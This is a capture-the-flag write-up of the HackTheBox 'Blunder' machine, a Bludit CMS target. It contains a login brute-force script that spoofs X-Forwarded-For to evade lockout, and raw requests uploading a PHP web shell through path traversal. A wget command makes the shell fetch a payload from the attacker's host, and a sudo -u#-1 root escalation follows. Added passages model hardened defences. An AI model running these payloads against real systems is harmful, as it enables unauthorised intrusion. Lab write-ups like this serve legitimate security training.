Blunder: HackTheBox

  • Directory busting to find the admin portal and the todo.txt file.
  • Brute force the admin password.
  • Exploit the file upload vulnerability to get a shell.
  • Enumerate the machine to escalate privileges.
  • Find an exploit to bypass the sudo restriction.

Nmap

# nmap -T4 -p- -A -o nmap 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.16s latency).
Not shown: 65533 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Linux 2.6.32 - 3.1 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Linux 3.7 (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.0 - 3.2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

-T4 : 4 threads
-p- : scan all the ports
-A : OS detection, version detection, traceroute
-o : Output scan result to file

Port 80

Directory busting

$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.191 -x php,txt -o dirs
/about (Status: 200)
/0 (Status: 200)
/admin (Status: 301)
/install.php (Status: 200)
/empty (Status: 200)
/robots.txt (Status: 200)
/todo.txt (Status: 200)
/usb (Status: 200)
/LICENSE (Status: 200)
-w : wordlist
-u : URL
-x : File extensions to search for
-o : Output file to write results

Contents of /todo.txt:

-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
$ cewl -w ro.txt http://10.10.10.191

#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/'
username = 'fergus'
wordlist = []

# Generate 50 incorrect passwords
#for i in range(50):
#    wordlist.append('Password{i}'.format(i = i))

# Add the correct password to the end of the list
#wordlist.append('adminadmin')

# Load candidate passwords, one per line (the cewl output)
with open("wordlists") as f:
    for data in f.readlines():
        wordlist.append(data.strip())

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    # Every login form carries a fresh CSRF token; extract it from the page
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    # The failed-login counter is keyed on X-Forwarded-For, which the client
    # controls, so a new value on every request keeps the lockout from triggering
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    # A successful login answers with a redirect to the dashboard
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
Found: fergus : RolandDeschain
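The script works because the login lockout counts failures per X-Forwarded-For value, and that header is whatever the client sends. As an added example (not the page's code and not Bludit's), a simplified Python model of such a limiter in its weak form beside a hardened form that keys on the TCP peer address and honours X-Forwarded-For only from a trusted proxy; the threshold, the proxy range and the peer address are assumed values.

```python
import ipaddress
from collections import defaultdict

MAX_FAILURES = 10  # assumed lockout threshold for this demo

class Request:
    """Constructed stand-in for an HTTP request: TCP peer address plus headers."""
    def __init__(self, peer_ip, headers=None):
        self.peer_ip = peer_ip
        self.headers = headers or {}

class VulnerableLimiter:
    """Keys failed logins on X-Forwarded-For, a header the client sets freely."""
    def __init__(self):
        self.failures = defaultdict(int)
    def client_key(self, req):
        return req.headers.get("X-Forwarded-For", req.peer_ip)
    def record_failure(self, req):
        self.failures[self.client_key(req)] += 1
    def is_locked(self, req):
        return self.failures[self.client_key(req)] >= MAX_FAILURES

class HardenedLimiter(VulnerableLimiter):
    """Honours X-Forwarded-For only when the TCP peer is a trusted reverse proxy,
    and then only its last hop; otherwise the socket address is the key."""
    def __init__(self, trusted_proxies):
        super().__init__()
        self.trusted = [ipaddress.ip_network(p) for p in trusted_proxies]
    def client_key(self, req):
        peer = ipaddress.ip_address(req.peer_ip)
        if not any(peer in net for net in self.trusted):
            return req.peer_ip  # spoofed header from a non-proxy changes nothing
        hops = [h.strip() for h in req.headers.get("X-Forwarded-For", "").split(",")]
        try:
            return str(ipaddress.ip_address(hops[-1]))
        except ValueError:  # empty or non-IP value: fall back to the peer
            return req.peer_ip

def simulate(limiter, attempts):
    """Replay `attempts` failed logins from one host that rotates X-Forwarded-For
    per request, as the script above does; returns how many got through."""
    allowed = 0
    for i in range(attempts):
        req = Request("203.0.113.5", {"X-Forwarded-For": "guess%d" % i})
        if limiter.is_locked(req):
            break
        limiter.record_failure(req)
        allowed += 1
    return allowed
```

With the weak limiter all 50 rotating attempts are accepted; the hardened one stops the same host after 10, which is also the event a login-failure alert should be keyed on.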
http://10.10.10.191/admin/about
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
Content-Length: 27550
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvdbAfQfvdjrTLooA
Origin: http://10.10.10.191
Referer: http://10.10.10.191/admin/new-content
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie: BLUDIT-KEY=q5604mab2r7h11hua34crtng26
Connection: close
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="images[]"; filename="bear.jpg"
Content-Type: image/jpeg
//imagedata
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="uuid"
7f974f44bd782ce95b7822da7bfea72a
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="tokenCSRF"
3932e46b872ca59f022dd197c1b03b60b9f0d2c0
------WebKitFormBoundaryvdbAfQfvdjrTLooA--
http://10.10.10.191/bl-content/uploads/pages/uuid-value
http://10.10.10.191/bl-content/tmp/temp/
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
Content-Length: 456
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvdbAfQfvdjrTLooA
Origin: http://10.10.10.191
Referer: http://10.10.10.191/admin/new-content
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie: BLUDIT-KEY=q5604mab2r7h11hua34crtng26
Connection: close
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="images[]"; filename="evil.jpg"
Content-Type: image/jpeg
<?php system($_GET['cmd']); ?>
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="uuid"
../../tmp/temp
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="tokenCSRF"
3932e46b872ca59f022dd197c1b03b60b9f0d2c0
------WebKitFormBoundaryvdbAfQfvdjrTLooA--
HTTP/1.1 200 OK
Date: Thu, 13 Aug 2020 17:00:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 63
Connection: close
Content-Type: application/json
{"status":0,"message":"Images uploaded.","images":["evil.jpg"]}
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
Content-Length: 456
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvdbAfQfvdjrTLooA
Origin: http://10.10.10.191
Referer: http://10.10.10.191/admin/new-content
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie: BLUDIT-KEY=q5604mab2r7h11hua34crtng26
Connection: close
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="images[]"; filename=".htaccess"
Content-Type: image/jpeg
RewriteEngine Off
AddType application/x-httpd-php .jpg

------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="uuid"
../../tmp/temp
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="tokenCSRF"
3932e46b872ca59f022dd197c1b03b60b9f0d2c0
------WebKitFormBoundaryvdbAfQfvdjrTLooA--
HTTP/1.1 200 OK
Date: Thu, 13 Aug 2020 17:06:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 92
Connection: close
Content-Type: application/json
{"status":1,"message":"File type is not supported. Allowed types: gif, png, jpg, jpeg, svg"}

http://10.10.10.191/bl-content/tmp/temp/evil.jpg?cmd=whoami
www-data
http://10.10.10.191/bl-content/tmp/uploaded-php-file
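The traversal above works because the `uuid` form field is used as a directory name under the upload root. As an added example (not Bludit's code), a simplified Python model of that path-building step in its weak form beside a hardened form that validates the uuid, checks the extension against the allowed list from the error message above before anything is written, and confines the resolved path to the upload root; the base path `/var/www/bludit` used in the checks is assumed.

```python
import os
import re

# Allowed extensions as listed in the server's own error message above
ALLOWED_EXT = {"gif", "png", "jpg", "jpeg", "svg"}
# The uuid values on this page are 32 hex characters; anything else is rejected
UUID_RE = re.compile(r"[0-9a-f]{32}")

class UploadRejected(Exception):
    pass

def _upload_root(base):
    return os.path.realpath(os.path.join(base, "bl-content", "uploads", "pages"))

def vulnerable_target(base, uuid, filename):
    """Weak pattern: the client-supplied uuid is spliced into the destination
    directory unchecked, so '../../tmp/temp' walks out of uploads/pages."""
    return os.path.normpath(os.path.join(base, "bl-content", "uploads", "pages", uuid, filename))

def hardened_target(base, uuid, filename):
    """Validate first, write never: uuid format, extension and dotfile checks,
    then a realpath confinement check, all before the file touches disk."""
    if not UUID_RE.fullmatch(uuid):
        raise UploadRejected("bad uuid")
    name = os.path.basename(filename)  # drop any directory part
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if name.startswith(".") or ext not in ALLOWED_EXT:
        raise UploadRejected("file type not allowed")  # blocks .htaccess too
    root = _upload_root(base)
    dest = os.path.realpath(os.path.join(root, uuid, name))
    if os.path.commonpath([root, dest]) != root:
        raise UploadRejected("path escapes upload root")
    return dest

def upload_decision(base, uuid, filename):
    """Wrapper returning 'accepted:<path>' or 'rejected:<reason>'."""
    try:
        return "accepted:" + hardened_target(base, uuid, filename)
    except UploadRejected as exc:
        return "rejected:" + str(exc)
```

An extension check says nothing about file content, so the web server must also refuse to execute PHP under the upload directory and ignore per-directory .htaccess files there (AllowOverride None in Apache).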

Getting Shell

http://10.10.10.191/bl-content/tmp/temp/evil.jpg?cmd=wget%2010.10.14.192:8000/sh.php

drwxr-xr-x  5 root     root     4096 Nov 28  2019 .
drwxr-xr-x 15 root     root     4096 Nov 27  2019 ..
drwxr-xr-x  8 www-data www-data 4096 May 19 15:13 bludit-3.10.0a
drwxrwxr-x  8 www-data www-data 4096 Apr 28 12:18 bludit-3.9.2
drwxr-xr-x  2 root     root     4096 Nov 28  2019 html

<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    }
}

$ su hugo
Password : Password123
$ /bin/bash
hugo@blunder:~$ wc user.txt
1 1 33 user.txt

Root

hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo#

Roshan Guragain